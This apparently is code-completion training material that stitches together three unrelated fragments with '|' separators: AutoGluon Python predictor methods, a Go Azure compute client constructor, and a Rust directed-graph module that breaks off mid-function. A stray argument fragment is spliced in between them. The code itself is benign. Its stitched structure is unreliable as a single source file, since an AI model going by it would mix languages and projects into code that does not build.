get_original_labels : bool, default = True
Whether or not predictions should be formatted in terms of the original labels.
For example, the labels might be "entailment" or "not_entailment" and predictions could either be of this form (if `True`) or integer-indices corresponding to these classes (if `False`).
stochastic_chunk : bool or None, default = None
Whether to turn on stochastic chunk
num_repeat : int or None
The number of repeats
Returns
-------
predictions : array
The predictions for each sample. Shape of this array is (#Samples,).
"""
return self._internal_predict(test_data,
get_original_labels=get_original_labels,
get_probabilities=False,
stochastic_chunk=stochastic_chunk,
num_repeat=num_repeat)
def save(self, dir_path):
"""Save this model to disk.
Parameters
----------
dir_path : str
Directory where the model should be saved.
"""
os.makedirs(dir_path, exist_ok=True)
self.net.save_parameters(os.path.join(dir_path, 'net.params'))
with open(os.path.join(dir_path, 'cfg.yml'), 'w') as of:
of.write(self.config.dump())
# Save preprocessor
with open(os.path.join(dir_path, 'preprocessor.pkl'), 'wb') as of:
pickle.dump(self.preprocessor, of)
if not isinstance(self._eval_metric, str):
eval_metric = self._eval_metric.name
else:
eval_metric = self._eval_metric
log_metrics = []
for metric in self._log_metrics:
if not isinstance(metric, str):
log_metrics.append(metric.name)
else:
log_metrics.append(metric)
# Save additional assets about the parsed dataset information
with open(os.path.join(dir_path, 'assets.json'), 'w') as of:
json.dump(
{
'problem_type': self._problem_type,
'label_columns': self._label_columns,
'eval_metric': eval_metric,
'log_metrics': log_metrics,
'feature_columns': self._feature_columns,
'column_types': self._column_types,
'version': version.__version__,
}, of, ensure_ascii=True)
@classmethod
def load(cls, dir_path: str):
"""Load a model object previously produced by `fit()` from disk and return this object.
It is highly recommended the predictor be loaded with the exact AutoGluon version
it was fit with.
Parameters
----------
dir_path
Path to directory where this model was previously saved.
Returns
-------
model
A `BertForTextPredictionBasic` object that can be used for making predictions on new data.
"""
cfg = base_cfg().clone_merge(os.path.join(dir_path, 'cfg.yml'))
with open(os.path.join(dir_path, 'preprocessor.pkl'), 'rb') as in_f:
preprocessor = pickle.load(in_f)
with open(os.path.join(dir_path, 'assets.json'), 'r') as f:
assets = json.load(f)
label_columns = assets['label_columns']
feature_columns = assets['feature_columns']
eval_metric = assets['eval_metric']
log_metrics = assets['log_metrics']
problem_type = assets['problem_type']
column_types = assets['column_types']
# TODO(sxjscience) Post 0.1. In general, we will need to support compatible version check
version = assets['version']
backbone_model_cls, backbone_cfg, tokenizer, backbone_params_path, _ \
= get_backbone(cfg.model.backbone.name)
if 'roberta' in cfg.model.backbone.name:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg, return_all_hiddens=True)
else:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg)
if problem_type == REGRESSION:
out_shape = 1
elif problem_type == MULTICLASS:
out_shape = len(preprocessor.label_generator.classes_)
elif problem_type == BINARY:
assert len(preprocessor.label_generator.classes_) == 2
out_shape = 2
else:
raise NotImplementedError
net = MultiModalWithPretrainedTextNN(
text_backbone=text_backbone,
num_text_features=1,
num_categorical_features=len(preprocessor.categorical_feature_names),
num_numerical_features=len(preprocessor.numerical_feature_names) > 0,
numerical_input_units=None if len(preprocessor.numerical_feature_names) == 0
else len(preprocessor.numerical_feature_names),
num_categories=preprocessor.categorical_num_categories,
get_embedding=False,
cfg=cfg.model.network,
out_shape=out_shape)
net.hybridize()
ctx_l = mx.cpu()
net.load_parameters(os.path.join(dir_path, 'net.params'), ctx=ctx_l)
model = cls(column_types=column_types,
label_columns=label_columns,
feature_columns=feature_columns,
problem_type=problem_type,
eval_metric=eval_metric,
log_metrics=log_metrics)
model._net = net
model._config = cfg
model._preprocessor = preprocessor
return model
def extract_embedding(self, data, stochastic_chunk=None, num_repeat=None):
"""Extract the embedding from the pretrained model.
Parameters
----------
data
Data that can be parsed to pandas dataframe
stochastic_chunk
Whether to use stochastic chunk
num_repeat
The number of repeats
Returns
-------
embeddings
The output embeddings will have shape
(#samples, embedding_dim)
"""
if not isinstance(data, pd.DataFrame):
if isinstance(data, (list, dict)):
data = pd.DataFrame(data)
elif isinstance(data, str):
data = load_pd.load(data)
else:
raise NotImplementedError(f'The format of data is not understood. '
f'We have type(data)="{type(data)}"')
dataset = self.preprocessor.transform(data[self.feature_columns])
inference_batch_size = self.config.optimization.per_device_batch_size \
* self.config.optimization.val_batch_size_mult
cls_id, sep_id = get_cls_sep_id(self.preprocessor.tokenizer)
if stochastic_chunk is None:
stochastic_chunk = self.config.model.test_stochastic_chunk
batchify_fn = MultiModalTextBatchify(
num_text_inputs=len(self.preprocessor.text_feature_names),
num_categorical_inputs=len(self.preprocessor.categorical_feature_names),
num_numerical_inputs=len(self.preprocessor.numerical_feature_names) > 0,
cls_token_id=cls_id, sep_token_id=sep_id,
max_length=self.config.preprocessing.text.max_length,
mode='test',
stochastic_chunk=stochastic_chunk,
insert_sep=self.config.model.insert_sep)
dataloader = DataLoader(dataset,
batch_size=inference_batch_size,
shuffle=False,
batchify_fn=batchify_fn)
if self._embed_net is None:
embed_net = MultiModalWithPretrainedTextNN(
text_backbone=self.net.text_backbone,
num_text_features=1,
num_categorical_features=len(self.preprocessor.categorical_feature_names),
num_numerical_features=len(self.preprocessor.numerical_feature_names) > 0,
numerical_input_units=None if len(self.preprocessor.numerical_feature_names) == 0
else len(self.preprocessor.numerical_feature_names),
num_categories=self.preprocessor.categorical_num_categories,
get_embedding=True,
cfg=self.config.model.network,
out_shape=self.net.out_shape,
params=self.net.collect_params(),
prefix='embed_net_')
embed_net.hybridize()
self._embed_net = embed_net
if num_repeat is None:
num_repeat = self.config.model.inference_num_repeat
ctx_l = get_mxnet_available_ctx()
self._embed_net.collect_params().reset_ctx(ctx_l)
embeddings = _classification_regression_predict(self._embed_net,
dataloader=dataloader,
problem_type=self._problem_type,
label_scaler=self.preprocessor.label_scaler,
has_label=False,
extract_embedding=True,
num_repeat=num_repeat)
self._embed_net.collect_params().reset_ctx(mx.cpu())
return embeddings | time_limit=time_limit,
time_start=start_tick,
tuning_df_path=tuning_df_path, |
client.go | package client
import (
"github.com/Azure/azure-sdk-for-go/services/compute/mgmt/2019-12-01/compute"
"github.com/Azure/azure-sdk-for-go/services/marketplaceordering/mgmt/2015-06-01/marketplaceordering"
"github.com/terraform-providers/terraform-provider-azurerm/azurerm/internal/common"
)
type Client struct {
AvailabilitySetsClient *compute.AvailabilitySetsClient
DedicatedHostsClient *compute.DedicatedHostsClient
DedicatedHostGroupsClient *compute.DedicatedHostGroupsClient
DisksClient *compute.DisksClient
DiskEncryptionSetsClient *compute.DiskEncryptionSetsClient
GalleriesClient *compute.GalleriesClient
GalleryImagesClient *compute.GalleryImagesClient
GalleryImageVersionsClient *compute.GalleryImageVersionsClient
ProximityPlacementGroupsClient *compute.ProximityPlacementGroupsClient
MarketplaceAgreementsClient *marketplaceordering.MarketplaceAgreementsClient
ImagesClient *compute.ImagesClient
SnapshotsClient *compute.SnapshotsClient
UsageClient *compute.UsageClient
VMExtensionImageClient *compute.VirtualMachineExtensionImagesClient
VMExtensionClient *compute.VirtualMachineExtensionsClient
VMScaleSetClient *compute.VirtualMachineScaleSetsClient
VMScaleSetExtensionsClient *compute.VirtualMachineScaleSetExtensionsClient
VMScaleSetRollingUpgradesClient *compute.VirtualMachineScaleSetRollingUpgradesClient
VMScaleSetVMsClient *compute.VirtualMachineScaleSetVMsClient
VMClient *compute.VirtualMachinesClient
VMImageClient *compute.VirtualMachineImagesClient
}
func NewClient(o *common.ClientOptions) *Client | {
availabilitySetsClient := compute.NewAvailabilitySetsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&availabilitySetsClient.Client, o.ResourceManagerAuthorizer)
dedicatedHostsClient := compute.NewDedicatedHostsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&dedicatedHostsClient.Client, o.ResourceManagerAuthorizer)
dedicatedHostGroupsClient := compute.NewDedicatedHostGroupsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&dedicatedHostGroupsClient.Client, o.ResourceManagerAuthorizer)
disksClient := compute.NewDisksClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&disksClient.Client, o.ResourceManagerAuthorizer)
diskEncryptionSetsClient := compute.NewDiskEncryptionSetsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&diskEncryptionSetsClient.Client, o.ResourceManagerAuthorizer)
galleriesClient := compute.NewGalleriesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&galleriesClient.Client, o.ResourceManagerAuthorizer)
galleryImagesClient := compute.NewGalleryImagesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&galleryImagesClient.Client, o.ResourceManagerAuthorizer)
galleryImageVersionsClient := compute.NewGalleryImageVersionsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&galleryImageVersionsClient.Client, o.ResourceManagerAuthorizer)
imagesClient := compute.NewImagesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&imagesClient.Client, o.ResourceManagerAuthorizer)
marketplaceAgreementsClient := marketplaceordering.NewMarketplaceAgreementsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&marketplaceAgreementsClient.Client, o.ResourceManagerAuthorizer)
proximityPlacementGroupsClient := compute.NewProximityPlacementGroupsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&proximityPlacementGroupsClient.Client, o.ResourceManagerAuthorizer)
snapshotsClient := compute.NewSnapshotsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&snapshotsClient.Client, o.ResourceManagerAuthorizer)
usageClient := compute.NewUsageClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&usageClient.Client, o.ResourceManagerAuthorizer)
vmExtensionImageClient := compute.NewVirtualMachineExtensionImagesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmExtensionImageClient.Client, o.ResourceManagerAuthorizer)
vmExtensionClient := compute.NewVirtualMachineExtensionsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmExtensionClient.Client, o.ResourceManagerAuthorizer)
vmImageClient := compute.NewVirtualMachineImagesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmImageClient.Client, o.ResourceManagerAuthorizer)
vmScaleSetClient := compute.NewVirtualMachineScaleSetsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmScaleSetClient.Client, o.ResourceManagerAuthorizer)
vmScaleSetExtensionsClient := compute.NewVirtualMachineScaleSetExtensionsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmScaleSetExtensionsClient.Client, o.ResourceManagerAuthorizer)
vmScaleSetRollingUpgradesClient := compute.NewVirtualMachineScaleSetRollingUpgradesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmScaleSetRollingUpgradesClient.Client, o.ResourceManagerAuthorizer)
vmScaleSetVMsClient := compute.NewVirtualMachineScaleSetVMsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmScaleSetVMsClient.Client, o.ResourceManagerAuthorizer)
vmClient := compute.NewVirtualMachinesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmClient.Client, o.ResourceManagerAuthorizer)
return &Client{
AvailabilitySetsClient: &availabilitySetsClient,
DedicatedHostsClient: &dedicatedHostsClient,
DedicatedHostGroupsClient: &dedicatedHostGroupsClient,
DisksClient: &disksClient,
DiskEncryptionSetsClient: &diskEncryptionSetsClient,
GalleriesClient: &galleriesClient,
GalleryImagesClient: &galleryImagesClient,
GalleryImageVersionsClient: &galleryImageVersionsClient,
ImagesClient: &imagesClient,
MarketplaceAgreementsClient: &marketplaceAgreementsClient,
ProximityPlacementGroupsClient: &proximityPlacementGroupsClient,
SnapshotsClient: &snapshotsClient,
UsageClient: &usageClient,
VMExtensionImageClient: &vmExtensionImageClient,
VMExtensionClient: &vmExtensionClient,
VMScaleSetClient: &vmScaleSetClient,
VMScaleSetExtensionsClient: &vmScaleSetExtensionsClient,
VMScaleSetRollingUpgradesClient: &vmScaleSetRollingUpgradesClient,
VMScaleSetVMsClient: &vmScaleSetVMsClient,
VMClient: &vmClient,
VMImageClient: &vmImageClient,
}
} |
|
mod.rs | //! Implements a directed graph.
use rustc_hash::{FxHashMap, FxHashSet};
use std::cmp;
use std::collections::{BTreeMap, BTreeSet, VecDeque};
use std::fmt;
use crate::error::*;
pub trait Vertex: Clone + Sync {
// The index of this vertex.
fn index(&self) -> usize;
// A string to display in dot graphviz format.
fn dot_label(&self) -> String;
// Fill color in dot graphviz format.
fn dot_fill_color(&self) -> String {
"#ffddcc".to_string()
}
// Font color in dot graphviz format.
fn dot_font_color(&self) -> String {
"#000000".to_string()
}
}
pub trait Edge: Clone + Sync {
/// The index of the head vertex.
fn head(&self) -> usize;
/// The index of the tail vertex.
fn tail(&self) -> usize;
/// A string to display in dot graphviz format.
fn dot_label(&self) -> String;
// Style in dot graphviz format.
fn dot_style(&self) -> String {
"solid".to_string()
}
// Fill color in dot graphviz format.
fn dot_fill_color(&self) -> String {
"#000000".to_string()
}
// Font color in dot graphviz format.
fn dot_font_color(&self) -> String {
"#000000".to_string()
}
// Pen width in dot graphviz format.
fn dot_pen_width(&self) -> f64 {
1.0
}
}
/// An empty vertex for creating structures when data is not required
#[derive(Clone, Debug, Deserialize, Eq, Hash, Ord, PartialEq, PartialOrd, Serialize)]
pub struct NullVertex {
index: usize,
}
impl NullVertex {
pub fn new(index: usize) -> NullVertex {
NullVertex { index }
}
}
impl Vertex for NullVertex {
fn index(&self) -> usize {
self.index
}
fn dot_label(&self) -> String {
format!("{}", self.index)
}
}
/// An empty edge for creating structures when data is not required
#[derive(Clone, Debug, Deserialize, Eq, Hash, Ord, PartialEq, PartialOrd, Serialize)]
pub struct NullEdge {
head: usize,
tail: usize,
}
impl NullEdge {
pub fn new(head: usize, tail: usize) -> NullEdge {
NullEdge { head, tail }
}
}
impl Edge for NullEdge {
fn head(&self) -> usize {
self.head
}
fn tail(&self) -> usize {
self.tail
}
fn dot_label(&self) -> String {
format!("{} -> {}", self.head, self.tail)
}
}
#[derive(Clone, Debug, Deserialize, Eq, Hash, Ord, PartialEq, PartialOrd, Serialize)]
pub struct Loop {
header: usize,
nodes: BTreeSet<usize>,
}
impl Loop {
pub fn new(header: usize, nodes: BTreeSet<usize>) -> Self {
Self { header, nodes }
}
/// The set of nodes part of this loop
pub fn nodes(&self) -> &BTreeSet<usize> {
&self.nodes
}
/// The loop header node
pub fn header(&self) -> usize {
self.header
}
/// The set of loop tail nodes
pub fn tail(&self) -> BTreeSet<usize> {
let mut tail_nodes = self.nodes.clone();
tail_nodes.remove(&self.header);
tail_nodes
}
/// Returns `true` if this loop is nesting another loop.
pub fn is_nesting(&self, other: &Self) -> bool {
self.header != other.header && self.nodes.contains(&other.header)
}
/// Returns `true` if this loop and another loop are disjoint.
pub fn is_disjoint(&self, other: &Self) -> bool {
self.header != other.header
&& !self.nodes.contains(&other.header)
&& !other.nodes.contains(&self.header)
}
}
impl Vertex for Loop {
fn index(&self) -> usize {
self.header
}
fn dot_label(&self) -> String {
format!("{}", self)
}
}
impl fmt::Display for Loop {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Loop 0x{:X}: {{", self.header)?;
let mut is_first = true;
for node in &self.nodes {
if !is_first {
write!(f, ", ")?;
}
write!(f, "0x{:X}", node)?;
is_first = false;
}
write!(f, "}}")
}
}
pub type LoopTree = Graph<Loop, NullEdge>;
/// A directed graph.
#[derive(Clone, Debug, Deserialize, Eq, Hash, Ord, PartialEq, PartialOrd, Serialize, Default)]
pub struct Graph<V: Vertex, E: Edge> {
vertices: BTreeMap<usize, V>,
edges: BTreeMap<(usize, usize), E>,
successors: BTreeMap<usize, BTreeSet<usize>>,
predecessors: BTreeMap<usize, BTreeSet<usize>>,
}
impl<V, E> Graph<V, E>
where
V: Vertex,
E: Edge,
{
pub fn new() -> Graph<V, E> {
Graph {
vertices: BTreeMap::new(),
edges: BTreeMap::new(),
successors: BTreeMap::new(),
predecessors: BTreeMap::new(),
}
}
pub fn num_vertices(&self) -> usize {
self.vertices.len()
}
/// Returns true if the vertex with the given index exists in this graph
pub fn has_vertex(&self, index: usize) -> bool {
self.vertices.contains_key(&index)
}
/// Removes a vertex, and all edges associated with that vertex.
pub fn remove_vertex(&mut self, index: usize) -> Result<()> {
// TODO there's a lot of duplicated work in removing edges. Makes
// debugging easier, but could be made much more efficient.
if !self.has_vertex(index) {
bail!("vertex does not exist");
}
// remove this vertex
self.vertices.remove(&index);
// find all edges that deal with this vertex
let mut edges = FxHashSet::default();
if let Some(successors) = self.successors.get(&index) {
for successor in successors {
edges.insert((index, *successor));
}
};
if let Some(predecessors) = self.predecessors.get(&index) {
for predecessor in predecessors {
edges.insert((*predecessor, index));
}
};
// remove all of those edges
for edge in edges {
self.remove_edge(edge.0, edge.1)?;
}
self.predecessors.remove(&index);
self.successors.remove(&index);
Ok(())
}
/// Removes all unreachable vertices from this graph.
/// Unreachable means that there is no path from head to the vertex.
pub fn remove_unreachable_vertices(&mut self, head: usize) -> Result<()> {
self.unreachable_vertices(head)?
.iter()
.for_each(|vertex| self.remove_vertex(*vertex).unwrap());
Ok(())
}
/// Returns true if the edge with the given head and tail index exists in this graph
pub fn has_edge(&self, head: usize, tail: usize) -> bool {
self.edges.contains_key(&(head, tail))
}
/// Removes an edge
pub fn remove_edge(&mut self, head: usize, tail: usize) -> Result<()> {
if !self.has_edge(head, tail) {
bail!("edge does not exist");
}
self.edges.remove(&(head, tail));
self.predecessors.get_mut(&tail).unwrap().remove(&head);
self.successors.get_mut(&head).unwrap().remove(&tail);
Ok(())
}
/// Inserts a vertex into the graph.
/// # Errors
/// Error if the vertex already exists by index.
pub fn insert_vertex(&mut self, v: V) -> Result<()> {
if self.vertices.contains_key(&v.index()) {
return Err("duplicate vertex index".into());
}
self.vertices.insert(v.index(), v.clone());
self.successors.insert(v.index(), BTreeSet::new());
self.predecessors.insert(v.index(), BTreeSet::new());
Ok(())
}
/// Inserts an edge into the graph.
/// # Errors
/// Error if the edge already exists by indices.
pub fn insert_edge(&mut self, edge: E) -> Result<()> {
if self.edges.contains_key(&(edge.head(), edge.tail())) {
return Err("duplicate edge".into());
}
if !self.vertices.contains_key(&edge.head()) {
return Err(ErrorKind::GraphVertexNotFound(edge.head()).into());
}
if !self.vertices.contains_key(&edge.tail()) {
return Err(ErrorKind::GraphVertexNotFound(edge.tail()).into());
}
self.edges.insert((edge.head(), edge.tail()), edge.clone());
self.successors
.get_mut(&edge.head())
.unwrap()
.insert(edge.tail());
self.predecessors
.get_mut(&edge.tail())
.unwrap()
.insert(edge.head());
Ok(())
}
/// Returns all immediate successors of a vertex from the graph.
pub fn successors(&self, index: usize) -> Result<Vec<&V>> {
if !self.vertices.contains_key(&index) {
bail!(
"Vertex {} does not exist and therefor has no successors",
index
);
}
let vertices = &self.successors[&index];
Ok(vertices.iter().fold(Vec::new(), |mut v, index| {
v.push(self.vertices.get(index).unwrap());
v
}))
}
/// Returns all immediate predecessors of a vertex from the graph.
pub fn predecessors(&self, index: usize) -> Result<Vec<&V>> {
if !self.vertices.contains_key(&index) {
bail!(
"Vertex {} does not exist and therefor has no predecessors",
index
);
}
let vertices = &self.predecessors[&index];
Ok(vertices.iter().fold(Vec::new(), |mut v, index| {
v.push(self.vertices.get(index).unwrap());
v
}))
}
/// Returns the indices of all immediate successors of a vertex from the graph.
pub fn successor_indices(&self, index: usize) -> Result<Vec<usize>> {
if !self.vertices.contains_key(&index) {
bail!(
"Vertex {} does not exist and therefor has no successors",
index
);
}
Ok(self.successors[&index].iter().cloned().collect())
}
/// Returns the indices of all immediate predecessors of a vertex from the graph.
pub fn predecessor_indices(&self, index: usize) -> Result<Vec<usize>> {
if !self.vertices.contains_key(&index) {
bail!(
"Vertex {} does not exist and therefor has no predecessors",
index
);
}
Ok(self.predecessors[&index].iter().cloned().collect())
}
/// Returns all vertices which don't have any predecessors in the graph.
pub fn vertices_without_predecessors(&self) -> Vec<&V> {
self.vertices
.values()
.filter(|v| self.predecessors.get(&v.index()).unwrap().is_empty())
.collect()
}
/// Returns all vertices which don't have any successors in the graph.
pub fn vertices_without_successors(&self) -> Vec<&V> {
self.vertices
.values()
.filter(|v| self.successors.get(&v.index()).unwrap().is_empty())
.collect()
}
/// Computes the set of vertices unreachable from the given index.
pub fn unreachable_vertices(&self, index: usize) -> Result<FxHashSet<usize>> {
let reachable_vertices = self.reachable_vertices(index)?;
Ok(self
.vertices
.keys()
.filter(|index| !reachable_vertices.contains(index))
.cloned()
.collect())
}
/// Computes the set of vertices reachable from the given index.
pub fn reachable_vertices(&self, index: usize) -> Result<FxHashSet<usize>> {
if !self.has_vertex(index) {
bail!("vertex does not exist");
}
let mut reachable_vertices: FxHashSet<usize> = FxHashSet::default();
let mut queue: Vec<usize> = vec![index];
reachable_vertices.insert(index);
while let Some(vertex) = queue.pop() {
self.successors
.get(&vertex)
.unwrap()
.iter()
.for_each(|&succ| {
if reachable_vertices.insert(succ) {
queue.push(succ)
}
});
}
Ok(reachable_vertices)
}
/// Compute the pre order of all vertices in the graph
pub fn compute_pre_order(&self, root: usize) -> Result<Vec<usize>> {
if !self.has_vertex(root) {
bail!("vertex does not exist");
}
let mut visited: FxHashSet<usize> = FxHashSet::default();
let mut stack: Vec<usize> = Vec::new();
let mut order: Vec<usize> = Vec::new();
stack.push(root);
while let Some(node) = stack.pop() {
if !visited.insert(node) {
continue;
}
order.push(node);
for &successor in &self.successors[&node] {
stack.push(successor);
}
}
Ok(order)
}
// Compute the post order of all vertices in the graph
pub fn compute_post_order(&self, root: usize) -> Result<Vec<usize>> {
let mut visited: FxHashSet<usize> = FxHashSet::default();
let mut order: Vec<usize> = Vec::new();
fn dfs_walk<V: Vertex, E: Edge>(
graph: &Graph<V, E>,
node: usize,
visited: &mut FxHashSet<usize>,
order: &mut Vec<usize>,
) -> Result<()> {
visited.insert(node);
for successor in &graph.successors[&node] {
if !visited.contains(successor) {
dfs_walk(graph, *successor, visited, order)?;
}
}
order.push(node);
Ok(())
}
dfs_walk(self, root, &mut visited, &mut order)?;
Ok(order)
}
/// Computes the dominance frontiers for all vertices in the graph
pub fn compute_dominance_frontiers(
&self,
start_index: usize,
) -> Result<FxHashMap<usize, FxHashSet<usize>>> {
let mut df: FxHashMap<usize, FxHashSet<usize>> = FxHashMap::default();
for vertex in &self.vertices {
df.insert(*vertex.0, FxHashSet::default());
}
let idoms = self.compute_immediate_dominators(start_index)?;
for vertex in &self.vertices {
let vertex_index: usize = *vertex.0;
if self.predecessors[&vertex_index].len() >= 2 {
if !idoms.contains_key(&vertex_index) {
continue;
}
let idom = idoms[&vertex_index];
for predecessor in &self.predecessors[&vertex_index] {
let mut runner = *predecessor;
while runner != idom {
df.get_mut(&runner).unwrap().insert(vertex_index);
if !idoms.contains_key(&runner) {
break;
}
runner = idoms[&runner];
}
}
}
}
// Special handling for the start node as it can be part of a loop.
// This is necessary because we don't have a dedicated entry node.
for predecessor in &self.predecessors[&start_index] {
let mut runner = *predecessor;
loop {
df.get_mut(&runner).unwrap().insert(start_index);
if !idoms.contains_key(&runner) {
break;
}
runner = idoms[&runner];
}
}
Ok(df)
}
/// Computes immediate dominators for all vertices in the graph
///
/// This implementation is based on the Semi-NCA algorithm described in:
/// Georgiadis, Loukas: Linear-Time Algorithms for Dominators and Related Problems (thesis)
/// <https://www.cs.princeton.edu/research/techreps/TR-737-05>
pub fn compute_immediate_dominators(&self, root: usize) -> Result<FxHashMap<usize, usize>> {
if !self.vertices.contains_key(&root) {
bail!("vertex {} not in graph", root);
}
let dfs = self.compute_dfs_tree(root)?;
let dfs_pre_order = dfs.compute_pre_order(root)?;
let dfs_parent = |vertex| dfs.predecessors[&vertex].iter().next().cloned();
// DFS-numbering and reverse numbering (starting from 0 instead of 1 as in the paper)
let dfs_number: FxHashMap<usize, usize> = dfs_pre_order
.iter()
.enumerate()
.map(|(number, vertex)| (*vertex, number))
.collect();
let graph_number = &dfs_pre_order;
let mut ancestor: FxHashMap<usize, Option<usize>> = FxHashMap::default();
let mut label: FxHashMap<usize, usize> = FxHashMap::default();
for &vertex in self.vertices.keys() {
ancestor.insert(vertex, None);
label.insert(vertex, dfs_number[&vertex]);
}
// Compute semidominators in reverse preorder (without root)
let mut semi = FxHashMap::default();
for &vertex in dfs_pre_order.iter().skip(1).rev() {
let mut min_semi = std::usize::MAX;
for &pred in &self.predecessors[&vertex] {
if ancestor[&pred].is_some() {
compress(&mut ancestor, &mut label, pred);
}
min_semi = cmp::min(min_semi, label[&pred]);
}
semi.insert(vertex, min_semi);
label.insert(vertex, min_semi);
ancestor.insert(vertex, dfs_parent(vertex));
}
let semi = semi;
fn compress(
ancestor: &mut FxHashMap<usize, Option<usize>>,
label: &mut FxHashMap<usize, usize>,
v: usize,
) {
let u = ancestor[&v].unwrap();
if ancestor[&u].is_some() {
compress(ancestor, label, u);
if label[&u] < label[&v] {
label.insert(v, label[&u]);
}
ancestor.insert(v, ancestor[&u]);
}
}
// Compute immediate dominators in preorder (without root)
let mut idoms = FxHashMap::default();
for &vertex in dfs_pre_order.iter().skip(1) {
let mut idom = dfs_number[&dfs_parent(vertex).unwrap()];
while idom > semi[&vertex] {
idom = idoms[&idom];
}
idoms.insert(dfs_number[&vertex], idom);
}
let idoms = idoms;
// Translate idoms from DFS-numbering back to graph indices
let mut graph_idoms = FxHashMap::default();
for (vertex, idom) in idoms {
graph_idoms.insert(graph_number[vertex], graph_number[idom]);
}
Ok(graph_idoms)
}
/// Computes dominators for all vertices in the graph
pub fn compute_dominators(
&self,
start_index: usize,
) -> Result<FxHashMap<usize, FxHashSet<usize>>> {
if !self.vertices.contains_key(&start_index) {
bail!("vertex {} not in graph", start_index);
}
let dom_tree = self.compute_dominator_tree(start_index)?;
let dom_tree_pre_oder = dom_tree.compute_pre_order(start_index)?;
let mut dominators: FxHashMap<usize, FxHashSet<usize>> = FxHashMap::default();
for vertex in dom_tree_pre_oder {
let mut doms = FxHashSet::default();
doms.insert(vertex);
for pred in &dom_tree.predecessors[&vertex] {
doms.extend(&dominators[pred])
}
dominators.insert(vertex, doms);
}
Ok(dominators)
}
/// Creates a dominator tree with NullVertex and NullEdge
pub fn compute_dominator_tree(
&self,
start_index: usize,
) -> Result<Graph<NullVertex, NullEdge>> {
let mut graph = Graph::new();
for vertex in &self.vertices {
graph.insert_vertex(NullVertex::new(*vertex.0))?;
}
let idoms = self.compute_immediate_dominators(start_index)?;
for (vertex, idom) in idoms {
graph.insert_edge(NullEdge::new(idom, vertex))?;
}
Ok(graph)
}
/// Computes predecessors for all vertices in the graph
///
/// The resulting sets include all predecessors for each vertex in the
/// graph, not just immediate predecessors.
///
/// Given A -> B -> C, both A and B will be in the set for C.
pub fn compute_predecessors(&self) -> Result<FxHashMap<usize, FxHashSet<usize>>> {
let mut predecessors: FxHashMap<usize, FxHashSet<usize>> = FxHashMap::default();
let mut queue: VecDeque<usize> = VecDeque::new();
// initial population
for vertex in &self.vertices {
let mut preds = FxHashSet::default();
for predecessor in &self.predecessors[vertex.0] {
preds.insert(*predecessor);
}
predecessors.insert(*vertex.0, preds);
queue.push_back(*vertex.0);
}
// for every vertex
while let Some(vertex_index) = queue.pop_front() {
let this_predecessors = predecessors.get(&vertex_index).unwrap().clone();
for successor_index in &self.successors[&vertex_index] {
let successor_predecessors = predecessors.get_mut(successor_index).unwrap();
let mut changed = false;
for predecessor in &this_predecessors {
changed |= successor_predecessors.insert(*predecessor);
}
if changed {
queue.push_back(*successor_index);
}
}
}
Ok(predecessors)
}
/// Creates a DFS tree with NullVertex and NullEdge
pub fn compute_dfs_tree(&self, start_index: usize) -> Result<Graph<NullVertex, NullEdge>> {
if !self.has_vertex(start_index) {
bail!("vertex does not exist");
}
let mut tree = Graph::new();
let mut stack = Vec::new();
tree.insert_vertex(NullVertex::new(start_index))?;
for &successor in &self.successors[&start_index] {
stack.push((start_index, successor));
}
while let Some((pred, index)) = stack.pop() {
if tree.has_vertex(index) {
continue;
}
tree.insert_vertex(NullVertex::new(index))?;
tree.insert_edge(NullEdge::new(pred, index))?;
for &successor in &self.successors[&index] {
stack.push((index, successor));
}
}
Ok(tree)
}
/// Creates an acyclic graph with NullVertex and NullEdge
pub fn compute_acyclic(&self, start_index: usize) -> Result<Graph<NullVertex, NullEdge>> {
let mut graph = Graph::new();
for vertex in &self.vertices {
graph.insert_vertex(NullVertex::new(*vertex.0))?;
}
let predecessors = self.compute_predecessors()?;
let mut visited = FxHashSet::default();
let mut queue = VecDeque::new();
queue.push_back(start_index);
while !queue.is_empty() {
let vertex_index = queue.pop_front().unwrap();
visited.insert(vertex_index);
let vertex_predecessors = &predecessors[&vertex_index];
for successor in &self.successors[&vertex_index] {
// skip edges that would create a loop
if visited.contains(successor) && vertex_predecessors.contains(successor) {
continue;
}
// successors we haven't seen yet get added to the queue
if !visited.contains(successor) && !queue.contains(successor) {
queue.push_back(*successor);
}
graph.insert_edge(NullEdge::new(vertex_index, *successor))?;
}
}
Ok(graph)
}
/// Determines if the graph is acyclic
pub fn is_acyclic(&self, root: usize) -> bool {
let mut permanent_marks: FxHashSet<usize> = FxHashSet::default();
